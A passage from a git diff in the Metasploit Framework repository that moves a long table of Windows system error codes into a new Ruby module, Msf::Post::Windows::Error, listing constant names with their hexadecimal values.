0x36C6 - ERROR_SXS_DUPLICATE_CLSID = 0x36C7 - ERROR_SXS_DUPLICATE_IID = 0x36C8 - ERROR_SXS_DUPLICATE_TLBID = 0x36C9 - ERROR_SXS_DUPLICATE_PROGID = 0x36CA - ERROR_SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB - ERROR_SXS_FILE_HASH_MISMATCH = 0x36CC - ERROR_SXS_POLICY_PARSE_ERROR = 0x36CD - ERROR_SXS_XML_E_MISSINGQUOTE = 0x36CE - ERROR_SXS_XML_E_COMMENTSYNTAX = 0x36CF - ERROR_SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 - ERROR_SXS_XML_E_BADNAMECHAR = 0x36D1 - ERROR_SXS_XML_E_BADCHARINSTRING = 0x36D2 - ERROR_SXS_XML_E_XMLDECLSYNTAX = 0x36D3 - ERROR_SXS_XML_E_BADCHARDATA = 0x36D4 - ERROR_SXS_XML_E_MISSINGWHITESPACE = 0x36D5 - ERROR_SXS_XML_E_EXPECTINGTAGEND = 0x36D6 - ERROR_SXS_XML_E_MISSINGSEMICOLON = 0x36D7 - ERROR_SXS_XML_E_UNBALANCEDPAREN = 0x36D8 - ERROR_SXS_XML_E_INTERNALERROR = 0x36D9 - ERROR_SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA - ERROR_SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB - ERROR_SXS_XML_E_MISSING_PAREN = 0x36DC - ERROR_SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD - ERROR_SXS_XML_E_MULTIPLE_COLONS = 0x36DE - ERROR_SXS_XML_E_INVALID_DECIMAL = 0x36DF - ERROR_SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 - ERROR_SXS_XML_E_INVALID_UNICODE = 0x36E1 - ERROR_SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 - ERROR_SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 - ERROR_SXS_XML_E_UNCLOSEDTAG = 0x36E4 - ERROR_SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 - ERROR_SXS_XML_E_MULTIPLEROOTS = 0x36E6 - ERROR_SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 - ERROR_SXS_XML_E_BADXMLDECL = 0x36E8 - ERROR_SXS_XML_E_MISSINGROOT = 0x36E9 - ERROR_SXS_XML_E_UNEXPECTEDEOF = 0x36EA - ERROR_SXS_XML_E_BADPEREFINSUBSET = 0x36EB - ERROR_SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC - ERROR_SXS_XML_E_UNCLOSEDENDTAG = 0x36ED - ERROR_SXS_XML_E_UNCLOSEDSTRING = 0x36EE - ERROR_SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF - ERROR_SXS_XML_E_UNCLOSEDDECL = 0x36F0 - ERROR_SXS_XML_E_UNCLOSEDCDATA = 0x36F1 - ERROR_SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 - ERROR_SXS_XML_E_INVALIDENCODING = 0x36F3 - ERROR_SXS_XML_E_INVALIDSWITCH = 0x36F4 - ERROR_SXS_XML_E_BADXMLCASE = 0x36F5 - ERROR_SXS_XML_E_INVALID_STANDALONE = 0x36F6 - ERROR_SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 - ERROR_SXS_XML_E_INVALID_VERSION = 0x36F8 - ERROR_SXS_XML_E_MISSINGEQUALS = 0x36F9 - ERROR_SXS_PROTECTION_RECOVERY_FAILED = 0x36FA - ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB - ERROR_SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC - ERROR_SXS_UNTRANSLATABLE_HRESULT = 0x36FD - ERROR_SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE - ERROR_SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF - ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 - ERROR_SXS_ASSEMBLY_MISSING = 0x3701 - ERROR_SXS_CORRUPT_ACTIVATION_STACK = 0x3702 - ERROR_SXS_CORRUPTION = 0x3703 - ERROR_SXS_EARLY_DEACTIVATION = 0x3704 - ERROR_SXS_INVALID_DEACTIVATION = 0x3705 - ERROR_SXS_MULTIPLE_DEACTIVATION = 0x3706 - ERROR_SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 - ERROR_SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 - ERROR_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 - ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A - ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B - ERROR_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C - ERROR_SXS_IDENTITY_PARSE_ERROR = 0x370D - ERROR_MALFORMED_SUBSTITUTION_STRING = 0x370E - ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F - ERROR_UNMAPPED_SUBSTITUTION_STRING = 0x3710 - ERROR_SXS_ASSEMBLY_NOT_LOCKED = 0x3711 - ERROR_SXS_COMPONENT_STORE_CORRUPT = 0x3712 - ERROR_ADVANCED_INSTALLER_FAILED = 0x3713 - ERROR_XML_ENCODING_MISMATCH = 0x3714 - ERROR_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 - ERROR_SXS_IDENTITIES_DIFFERENT = 0x3716 - ERROR_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 - ERROR_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 - ERROR_SXS_MANIFEST_TOO_BIG = 0x3719 - ERROR_SXS_SETTING_NOT_REGISTERED = 0x371A - ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B - ERROR_SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C - ERROR_GENERIC_COMMAND_FAILED = 0x371D - ERROR_SXS_FILE_HASH_MISSING = 0x371E - ERROR_EVT_INVALID_CHANNEL_PATH = 0x3A98 - ERROR_EVT_INVALID_QUERY = 0x3A99 - ERROR_EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A - ERROR_EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B - ERROR_EVT_INVALID_PUBLISHER_NAME = 0x3A9C - ERROR_EVT_INVALID_EVENT_DATA = 0x3A9D - ERROR_EVT_CHANNEL_NOT_FOUND = 0x3A9F - ERROR_EVT_MALFORMED_XML_TEXT = 0x3AA0 - ERROR_EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 - ERROR_EVT_CONFIGURATION_ERROR = 0x3AA2 - ERROR_EVT_QUERY_RESULT_STALE = 0x3AA3 - ERROR_EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 - ERROR_EVT_NON_VALIDATING_MSXML = 0x3AA5 - ERROR_EVT_FILTER_ALREADYSCOPED = 0x3AA6 - ERROR_EVT_FILTER_NOTELTSET = 0x3AA7 - ERROR_EVT_FILTER_INVARG = 0x3AA8 - ERROR_EVT_FILTER_INVTEST = 0x3AA9 - ERROR_EVT_FILTER_INVTYPE = 0x3AAA - ERROR_EVT_FILTER_PARSEERR = 0x3AAB - ERROR_EVT_FILTER_UNSUPPORTEDOP = 0x3AAC - ERROR_EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD - ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE - ERROR_EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF - ERROR_EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 - ERROR_EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 - ERROR_EVT_FILTER_TOO_COMPLEX = 0x3AB2 - ERROR_EVT_MESSAGE_NOT_FOUND = 0x3AB3 - ERROR_EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 - ERROR_EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 - ERROR_EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 - ERROR_EVT_MAX_INSERTS_REACHED = 0x3AB7 - ERROR_EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 - ERROR_EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 - ERROR_EVT_VERSION_TOO_OLD = 0x3ABA - ERROR_EVT_VERSION_TOO_NEW = 0x3ABB - ERROR_EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC - ERROR_EVT_PUBLISHER_DISABLED = 0x3ABD - ERROR_EVT_FILTER_OUT_OF_RANGE = 0x3ABE - ERROR_EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 - ERROR_EC_LOG_DISABLED = 0x3AE9 - ERROR_EC_CIRCULAR_FORWARDING = 0x3AEA - ERROR_EC_CREDSTORE_FULL = 0x3AEB - ERROR_EC_CRED_NOT_FOUND = 0x3AEC - ERROR_EC_NO_ACTIVE_CHANNEL = 0x3AED - ERROR_MUI_FILE_NOT_FOUND = 0x3AFC - ERROR_MUI_INVALID_FILE = 0x3AFD - ERROR_MUI_INVALID_RC_CONFIG = 0x3AFE - ERROR_MUI_INVALID_LOCALE_NAME = 0x3AFF - ERROR_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 - ERROR_MUI_FILE_NOT_LOADED = 0x3B01 - ERROR_RESOURCE_ENUM_USER_STOP = 0x3B02 - ERROR_MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 - ERROR_MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 - ERROR_MCA_INVALID_CAPABILITIES_STRING = 0x3B60 - ERROR_MCA_INVALID_VCP_VERSION = 0x3B61 - ERROR_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 - ERROR_MCA_MCCS_VERSION_MISMATCH = 0x3B63 - ERROR_MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 - ERROR_MCA_INTERNAL_ERROR = 0x3B65 - ERROR_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 - ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 - ERROR_AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 - ERROR_SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 - ERROR_HASH_NOT_SUPPORTED = 0x3BC4 - ERROR_HASH_NOT_PRESENT = 0x3BC5 - end diff --git a/lib/msf/core/post/windows/errors.rb b/lib/msf/core/post/windows/errors.rb new file mode 100644 index 0000000000..a2cfab530f --- /dev/null +++ b/lib/msf/core/post/windows/errors.rb @@ -0,0 +1,2531 @@ + +module Msf::Post::Windows::Error + ERROR_SUCCESS = 0x0000 + ERROR_INVALID_FUNCTION = 0x0001 + ERROR_FILE_NOT_FOUND = 0x0002 + ERROR_PATH_NOT_FOUND = 0x0003 + ERROR_TOO_MANY_OPEN_FILES = 0x0004 + ERROR_ACCESS_DENIED = 0x0005 + ERROR_INVALID_HANDLE = 0x0006 + ERROR_ARENA_TRASHED = 0x0007 + ERROR_NOT_ENOUGH_MEMORY = 0x0008 + ERROR_INVALID_BLOCK = 0x0009 + ERROR_BAD_ENVIRONMENT = 0x000A + ERROR_BAD_FORMAT = 0x000B + ERROR_INVALID_ACCESS = 0x000C + ERROR_INVALID_DATA = 0x000D + ERROR_OUTOFMEMORY = 0x000E + ERROR_INVALID_DRIVE = 0x000F + ERROR_CURRENT_DIRECTORY = 0x0010 + ERROR_NOT_SAME_DEVICE = 0x0011 + ERROR_NO_MORE_FILES = 0x0012 + ERROR_WRITE_PROTECT = 0x0013 + ERROR_BAD_UNIT = 0x0014 + ERROR_NOT_READY = 0x0015 + ERROR_BAD_COMMAND = 0x0016 + ERROR_CRC = 0x0017 + ERROR_BAD_LENGTH = 0x0018 + ERROR_SEEK = 0x0019 + ERROR_NOT_DOS_DISK = 0x001A + ERROR_SECTOR_NOT_FOUND = 0x001B + ERROR_OUT_OF_PAPER = 0x001C + ERROR_WRITE_FAULT = 0x001D + ERROR_READ_FAULT = 0x001E + ERROR_GEN_FAILURE = 0x001F + ERROR_SHARING_VIOLATION = 0x0020 + ERROR_LOCK_VIOLATION = 0x0021 + ERROR_WRONG_DISK = 0x0022 + ERROR_SHARING_BUFFER_EXCEEDED = 0x0024 + ERROR_HANDLE_EOF = 0x0026 + ERROR_HANDLE_DISK_FULL = 0x0027 + ERROR_NOT_SUPPORTED = 0x0032 + ERROR_REM_NOT_LIST = 0x0033 + ERROR_DUP_NAME = 0x0034 + ERROR_BAD_NETPATH = 0x0035 + ERROR_NETWORK_BUSY = 0x0036 + ERROR_DEV_NOT_EXIST = 0x0037 + ERROR_TOO_MANY_CMDS = 0x0038 + ERROR_ADAP_HDW_ERR = 0x0039 + ERROR_BAD_NET_RESP = 0x003A + ERROR_UNEXP_NET_ERR = 0x003B + ERROR_BAD_REM_ADAP = 0x003C + ERROR_PRINTQ_FULL = 0x003D + ERROR_NO_SPOOL_SPACE = 0x003E + ERROR_PRINT_CANCELLED = 0x003F + ERROR_NETNAME_DELETED = 0x0040 + ERROR_NETWORK_ACCESS_DENIED = 0x0041 + ERROR_BAD_DEV_TYPE = 0x0042 + ERROR_BAD_NET_NAME = 0x0043 + ERROR_TOO_MANY_NAMES = 0x0044 + ERROR_TOO_MANY_SESS = 0x0045 + ERROR_SHARING_PAUSED = 0x0046 + ERROR_REQ_NOT_ACCEP = 0x0047 + ERROR_REDIR_PAUSED = 0x0048 + ERROR_FILE_EXISTS = 0x0050 + ERROR_CANNOT_MAKE = 0x0052 + ERROR_FAIL_I24 = 0x0053 + ERROR_OUT_OF_STRUCTURES = 0x0054 + ERROR_ALREADY_ASSIGNED = 0x0055 + ERROR_INVALID_PASSWORD = 0x0056 + ERROR_INVALID_PARAMETER = 0x0057 + ERROR_NET_WRITE_FAULT = 0x0058 + ERROR_NO_PROC_SLOTS = 0x0059 + ERROR_TOO_MANY_SEMAPHORES = 0x0064 + ERROR_EXCL_SEM_ALREADY_OWNED = 0x0065 + ERROR_SEM_IS_SET = 0x0066 + ERROR_TOO_MANY_SEM_REQUESTS = 0x0067 + ERROR_INVALID_AT_INTERRUPT_TIME = 0x0068 + ERROR_SEM_OWNER_DIED = 0x0069 + ERROR_SEM_USER_LIMIT = 0x006A + ERROR_DISK_CHANGE = 0x006B + ERROR_DRIVE_LOCKED = 0x006C + ERROR_BROKEN_PIPE = 0x006D + ERROR_OPEN_FAILED = 0x006E + ERROR_BUFFER_OVERFLOW = 0x006F + ERROR_DISK_FULL = 0x0070 + ERROR_NO_MORE_SEARCH_HANDLES = 0x0071 + ERROR_INVALID_TARGET_HANDLE = 0x0072 + ERROR_INVALID_CATEGORY = 0x0075 + ERROR_INVALID_VERIFY_SWITCH = 0x0076 + ERROR_BAD_DRIVER_LEVEL = 0x0077 + ERROR_CALL_NOT_IMPLEMENTED = 0x0078 + ERROR_SEM_TIMEOUT = 0x0079 + ERROR_INSUFFICIENT_BUFFER = 0x007A + ERROR_INVALID_NAME = 0x007B + ERROR_INVALID_LEVEL = 0x007C + ERROR_NO_VOLUME_LABEL = 0x007D + ERROR_MOD_NOT_FOUND = 0x007E + ERROR_PROC_NOT_FOUND = 0x007F + ERROR_WAIT_NO_CHILDREN = 0x0080 + ERROR_CHILD_NOT_COMPLETE = 0x0081 + ERROR_DIRECT_ACCESS_HANDLE = 0x0082 + ERROR_NEGATIVE_SEEK = 0x0083 + ERROR_SEEK_ON_DEVICE = 0x0084 + ERROR_IS_JOIN_TARGET = 0x0085 + ERROR_IS_JOINED = 0x0086 + ERROR_IS_SUBSTED = 0x0087 + ERROR_NOT_JOINED = 0x0088 + ERROR_NOT_SUBSTED = 0x0089 + ERROR_JOIN_TO_JOIN = 0x008A + ERROR_SUBST_TO_SUBST = 0x008B + ERROR_JOIN_TO_SUBST = 0x008C + ERROR_SUBST_TO_JOIN = 0x008D + ERROR_BUSY_DRIVE = 0x008E + ERROR_SAME_DRIVE = 0x008F + ERROR_DIR_NOT_ROOT = 0x0090 + ERROR_DIR_NOT_EMPTY = 0x0091 + ERROR_IS_SUBST_PATH = 0x0092 + ERROR_IS_JOIN_PATH = 0x0093 + ERROR_PATH_BUSY = 0x0094 + ERROR_IS_SUBST_TARGET = 0x0095 + ERROR_SYSTEM_TRACE = 0x0096 + ERROR_INVALID_EVENT_COUNT = 0x0097 + ERROR_TOO_MANY_MUXWAITERS = 0x0098 + ERROR_INVALID_LIST_FORMAT = 0x0099 + ERROR_LABEL_TOO_LONG = 0x009A + ERROR_TOO_MANY_TCBS = 0x009B + ERROR_SIGNAL_REFUSED = 0x009C + ERROR_DISCARDED = 0x009D + ERROR_NOT_LOCKED = 0x009E + ERROR_BAD_THREADID_ADDR = 0x009F + ERROR_BAD_ARGUMENTS = 0x00A0 + ERROR_BAD_PATHNAME = 0x00A1 + ERROR_SIGNAL_PENDING = 0x00A2 + ERROR_MAX_THRDS_REACHED = 0x00A4 + ERROR_LOCK_FAILED = 0x00A7 + ERROR_BUSY = 0x00AA + ERROR_CANCEL_VIOLATION = 0x00AD + ERROR_ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE + ERROR_INVALID_SEGMENT_NUMBER = 0x00B4 + ERROR_INVALID_ORDINAL = 0x00B6 + ERROR_ALREADY_EXISTS = 0x00B7 + ERROR_INVALID_FLAG_NUMBER = 0x00BA + ERROR_SEM_NOT_FOUND = 0x00BB + ERROR_INVALID_STARTING_CODESEG = 0x00BC + ERROR_INVALID_STACKSEG = 0x00BD + ERROR_INVALID_MODULETYPE = 0x00BE + ERROR_INVALID_EXE_SIGNATURE = 0x00BF + ERROR_EXE_MARKED_INVALID = 0x00C0 + ERROR_BAD_EXE_FORMAT = 0x00C1 + ERROR_ITERATED_DATA_EXCEEDS_64k = 0x00C2 + ERROR_INVALID_MINALLOCSIZE = 0x00C3 + ERROR_DYNLINK_FROM_INVALID_RING = 0x00C4 + ERROR_IOPL_NOT_ENABLED = 0x00C5 + ERROR_INVALID_SEGDPL = 0x00C6 + ERROR_AUTODATASEG_EXCEEDS_64k = 0x00C7 + ERROR_RING2SEG_MUST_BE_MOVABLE = 0x00C8 + ERROR_RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 + ERROR_INFLOOP_IN_RELOC_CHAIN = 0x00CA + ERROR_ENVVAR_NOT_FOUND = 0x00CB + ERROR_NO_SIGNAL_SENT = 0x00CD + ERROR_FILENAME_EXCED_RANGE = 0x00CE + ERROR_RING2_STACK_IN_USE = 0x00CF + ERROR_META_EXPANSION_TOO_LONG = 0x00D0 + ERROR_INVALID_SIGNAL_NUMBER = 0x00D1 + ERROR_THREAD_1_INACTIVE = 0x00D2 + ERROR_LOCKED = 0x00D4 + ERROR_TOO_MANY_MODULES = 0x00D6 + ERROR_NESTING_NOT_ALLOWED = 0x00D7 + ERROR_EXE_MACHINE_TYPE_MISMATCH = 0x00D8 + ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 + ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA + ERROR_FILE_CHECKED_OUT = 0x00DC + ERROR_CHECKOUT_REQUIRED = 0x00DD + ERROR_BAD_FILE_TYPE = 0x00DE + ERROR_FILE_TOO_LARGE = 0x00DF + ERROR_FORMS_AUTH_REQUIRED = 0x00E0 + ERROR_VIRUS_INFECTED = 0x00E1 + ERROR_VIRUS_DELETED = 0x00E2 + ERROR_PIPE_LOCAL = 0x00E5 + ERROR_BAD_PIPE = 0x00E6 + ERROR_PIPE_BUSY = 0x00E7 + ERROR_NO_DATA = 0x00E8 + ERROR_PIPE_NOT_CONNECTED = 0x00E9 + ERROR_MORE_DATA = 0x00EA + ERROR_VC_DISCONNECTED = 0x00F0 + ERROR_INVALID_EA_NAME = 0x00FE + ERROR_EA_LIST_INCONSISTENT = 0x00FF + ERROR_WAIT_TIMEOUT = 0x0102 + ERROR_NO_MORE_ITEMS = 0x0103 + ERROR_CANNOT_COPY = 0x010A + ERROR_DIRECTORY = 0x010B + ERROR_EAS_DIDNT_FIT = 0x0113 + ERROR_EA_FILE_CORRUPT = 0x0114 + ERROR_EA_TABLE_FULL = 0x0115 + ERROR_INVALID_EA_HANDLE = 0x0116 + ERROR_EAS_NOT_SUPPORTED = 0x011A + ERROR_NOT_OWNER = 0x0120 + ERROR_TOO_MANY_POSTS = 0x012A + ERROR_PARTIAL_COPY = 0x012B + ERROR_OPLOCK_NOT_GRANTED = 0x012C + ERROR_INVALID_OPLOCK_PROTOCOL = 0x012D + ERROR_DISK_TOO_FRAGMENTED = 0x012E + ERROR_DELETE_PENDING = 0x012F + ERROR_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 + ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 + ERROR_SECURITY_STREAM_IS_INCONSISTENT = 0x0132 + ERROR_INVALID_LOCK_RANGE = 0x0133 + ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 + ERROR_NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 + ERROR_MR_MID_NOT_FOUND = 0x013D + ERROR_SCOPE_NOT_FOUND = 0x013E + ERROR_FAIL_NOACTION_REBOOT = 0x015E + ERROR_FAIL_SHUTDOWN = 0x015F + ERROR_FAIL_RESTART = 0x0160 + ERROR_MAX_SESSIONS_REACHED = 0x0161 + ERROR_THREAD_MODE_ALREADY_BACKGROUND = 0x0190 + ERROR_THREAD_MODE_NOT_BACKGROUND = 0x0191 + ERROR_PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 + ERROR_PROCESS_MODE_NOT_BACKGROUND = 0x0193 + ERROR_INVALID_ADDRESS = 0x01E7 + ERROR_USER_PROFILE_LOAD = 0x01F4 + ERROR_ARITHMETIC_OVERFLOW = 0x0216 + ERROR_PIPE_CONNECTED = 0x0217 + ERROR_PIPE_LISTENING = 0x0218 + ERROR_VERIFIER_STOP = 0x0219 + ERROR_ABIOS_ERROR = 0x021A + ERROR_WX86_WARNING = 0x021B + ERROR_WX86_ERROR = 0x021C + ERROR_TIMER_NOT_CANCELED = 0x021D + ERROR_UNWIND = 0x021E + ERROR_BAD_STACK = 0x021F + ERROR_INVALID_UNWIND_TARGET = 0x0220 + ERROR_INVALID_PORT_ATTRIBUTES = 0x0221 + ERROR_PORT_MESSAGE_TOO_LONG = 0x0222 + ERROR_INVALID_QUOTA_LOWER = 0x0223 + ERROR_DEVICE_ALREADY_ATTACHED = 0x0224 + ERROR_INSTRUCTION_MISALIGNMENT = 0x0225 + ERROR_PROFILING_NOT_STARTED = 0x0226 + ERROR_PROFILING_NOT_STOPPED = 0x0227 + ERROR_COULD_NOT_INTERPRET = 0x0228 + ERROR_PROFILING_AT_LIMIT = 0x0229 + ERROR_CANT_WAIT = 0x022A + ERROR_CANT_TERMINATE_SELF = 0x022B + ERROR_UNEXPECTED_MM_CREATE_ERR = 0x022C + ERROR_UNEXPECTED_MM_MAP_ERROR = 0x022D + ERROR_UNEXPECTED_MM_EXTEND_ERR = 0x022E + ERROR_BAD_FUNCTION_TABLE = 0x022F + ERROR_NO_GUID_TRANSLATION = 0x0230 + ERROR_INVALID_LDT_SIZE = 0x0231 + ERROR_INVALID_LDT_OFFSET = 0x0233 + ERROR_INVALID_LDT_DESCRIPTOR = 0x0234 + ERROR_TOO_MANY_THREADS = 0x0235 + ERROR_THREAD_NOT_IN_PROCESS = 0x0236 + ERROR_PAGEFILE_QUOTA_EXCEEDED = 0x0237 + ERROR_LOGON_SERVER_CONFLICT = 0x0238 + ERROR_SYNCHRONIZATION_REQUIRED = 0x0239 + ERROR_NET_OPEN_FAILED = 0x023A + ERROR_IO_PRIVILEGE_FAILED = 0x023B + ERROR_CONTROL_C_EXIT = 0x023C + ERROR_MISSING_SYSTEMFILE = 0x023D + ERROR_UNHANDLED_EXCEPTION = 0x023E + ERROR_APP_INIT_FAILURE = 0x023F + ERROR_PAGEFILE_CREATE_FAILED = 0x0240 + ERROR_INVALID_IMAGE_HASH = 0x0241 + ERROR_NO_PAGEFILE = 0x0242 + ERROR_ILLEGAL_FLOAT_CONTEXT = 0x0243 + ERROR_NO_EVENT_PAIR = 0x0244 + ERROR_DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 + ERROR_ILLEGAL_CHARACTER = 0x0246 + ERROR_UNDEFINED_CHARACTER = 0x0247 + ERROR_FLOPPY_VOLUME = 0x0248 + ERROR_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 + ERROR_BACKUP_CONTROLLER = 0x024A + ERROR_MUTANT_LIMIT_EXCEEDED = 0x024B + ERROR_FS_DRIVER_REQUIRED = 0x024C + ERROR_CANNOT_LOAD_REGISTRY_FILE = 0x024D + ERROR_DEBUG_ATTACH_FAILED = 0x024E + ERROR_SYSTEM_PROCESS_TERMINATED = 0x024F + ERROR_DATA_NOT_ACCEPTED = 0x0250 + ERROR_VDM_HARD_ERROR = 0x0251 + ERROR_DRIVER_CANCEL_TIMEOUT = 0x0252 + ERROR_REPLY_MESSAGE_MISMATCH = 0x0253 + ERROR_LOST_WRITEBEHIND_DATA = 0x0254 + ERROR_CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 + ERROR_NOT_TINY_STREAM = 0x0256 + ERROR_STACK_OVERFLOW_READ = 0x0257 + ERROR_CONVERT_TO_LARGE = 0x0258 + ERROR_FOUND_OUT_OF_SCOPE = 0x0259 + ERROR_ALLOCATE_BUCKET = 0x025A + ERROR_MARSHALL_OVERFLOW = 0x025B + ERROR_INVALID_VARIANT = 0x025C + ERROR_BAD_COMPRESSION_BUFFER = 0x025D + ERROR_AUDIT_FAILED = 0x025E + ERROR_TIMER_RESOLUTION_NOT_SET = 0x025F + ERROR_INSUFFICIENT_LOGON_INFO = 0x0260 + ERROR_BAD_DLL_ENTRYPOINT = 0x0261 + ERROR_BAD_SERVICE_ENTRYPOINT = 0x0262 + ERROR_IP_ADDRESS_CONFLICT1 = 0x0263 + ERROR_IP_ADDRESS_CONFLICT2 = 0x0264 + ERROR_REGISTRY_QUOTA_LIMIT = 0x0265 + ERROR_NO_CALLBACK_ACTIVE = 0x0266 + ERROR_PWD_TOO_SHORT = 0x0267 + ERROR_PWD_TOO_RECENT = 0x0268 + ERROR_PWD_HISTORY_CONFLICT = 0x0269 + ERROR_UNSUPPORTED_COMPRESSION = 0x026A + ERROR_INVALID_HW_PROFILE = 0x026B + ERROR_INVALID_PLUGPLAY_DEVICE_PATH = 0x026C + ERROR_QUOTA_LIST_INCONSISTENT = 0x026D + ERROR_EVALUATION_EXPIRATION = 0x026E + ERROR_ILLEGAL_DLL_RELOCATION = 0x026F + ERROR_DLL_INIT_FAILED_LOGOFF = 0x0270 + ERROR_VALIDATE_CONTINUE = 0x0271 + ERROR_NO_MORE_MATCHES = 0x0272 + ERROR_RANGE_LIST_CONFLICT = 0x0273 + ERROR_SERVER_SID_MISMATCH = 0x0274 + ERROR_CANT_ENABLE_DENY_ONLY = 0x0275 + ERROR_FLOAT_MULTIPLE_FAULTS = 0x0276 + ERROR_FLOAT_MULTIPLE_TRAPS = 0x0277 + ERROR_NOINTERFACE = 0x0278 + ERROR_DRIVER_FAILED_SLEEP = 0x0279 + ERROR_CORRUPT_SYSTEM_FILE = 0x027A + ERROR_COMMITMENT_MINIMUM = 0x027B + ERROR_PNP_RESTART_ENUMERATION = 0x027C + ERROR_SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D + ERROR_PNP_REBOOT_REQUIRED = 0x027E + ERROR_INSUFFICIENT_POWER = 0x027F + ERROR_MULTIPLE_FAULT_VIOLATION = 0x0280 + ERROR_SYSTEM_SHUTDOWN = 0x0281 + ERROR_PORT_NOT_SET = 0x0282 + ERROR_DS_VERSION_CHECK_FAILURE = 0x0283 + ERROR_RANGE_NOT_FOUND = 0x0284 + ERROR_NOT_SAFE_MODE_DRIVER = 0x0286 + ERROR_FAILED_DRIVER_ENTRY = 0x0287 + ERROR_DEVICE_ENUMERATION_ERROR = 0x0288 + ERROR_MOUNT_POINT_NOT_RESOLVED = 0x0289 + ERROR_INVALID_DEVICE_OBJECT_PARAMETER = 0x028A + ERROR_MCA_OCCURED = 0x028B + ERROR_DRIVER_DATABASE_ERROR = 0x028C + ERROR_SYSTEM_HIVE_TOO_LARGE = 0x028D + ERROR_DRIVER_FAILED_PRIOR_UNLOAD = 0x028E + ERROR_VOLSNAP_PREPARE_HIBERNATE = 0x028F + ERROR_HIBERNATION_FAILURE = 0x0290 + ERROR_FILE_SYSTEM_LIMITATION = 0x0299 + ERROR_ASSERTION_FAILURE = 0x029C + ERROR_ACPI_ERROR = 0x029D + ERROR_WOW_ASSERTION = 0x029E + ERROR_PNP_BAD_MPS_TABLE = 0x029F + ERROR_PNP_TRANSLATION_FAILED = 0x02A0 + ERROR_PNP_IRQ_TRANSLATION_FAILED = 0x02A1 + ERROR_PNP_INVALID_ID = 0x02A2 + ERROR_WAKE_SYSTEM_DEBUGGER = 0x02A3 + ERROR_HANDLES_CLOSED = 0x02A4 + ERROR_EXTRANEOUS_INFORMATION = 0x02A5 + ERROR_RXACT_COMMIT_NECESSARY = 0x02A6 + ERROR_MEDIA_CHECK = 0x02A7 + ERROR_GUID_SUBSTITUTION_MADE = 0x02A8 + ERROR_STOPPED_ON_SYMLINK = 0x02A9 + ERROR_LONGJUMP = 0x02AA + ERROR_PLUGPLAY_QUERY_VETOED = 0x02AB + ERROR_UNWIND_CONSOLIDATE = 0x02AC + 